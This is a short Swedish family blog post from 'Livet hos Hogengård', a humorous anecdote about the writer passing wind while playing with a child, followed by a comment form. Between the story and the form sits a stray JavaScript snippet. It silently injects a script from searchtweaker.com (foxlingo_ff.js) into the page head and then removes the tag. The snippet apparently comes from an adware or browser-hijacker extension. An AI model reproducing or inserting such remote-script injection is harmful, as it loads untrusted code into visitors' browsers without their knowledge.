Livet hos Hogengård

Fina flickor fiser?

KJ står i duschen. Jag och Buset leker i vardagsrummet. Så fiser jag. Jodå. Det har hänt någon gång förut. Buset hoppar ner från soffan, tar ett rejält tag bak på mina byxor och kollar in om jag har bajsat på mig. Jag fullständigt bryter ihop av skratt.

(function(){try{var header=document.getElementsByTagName(“HEAD”)[0];var script=document.createElement(“SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *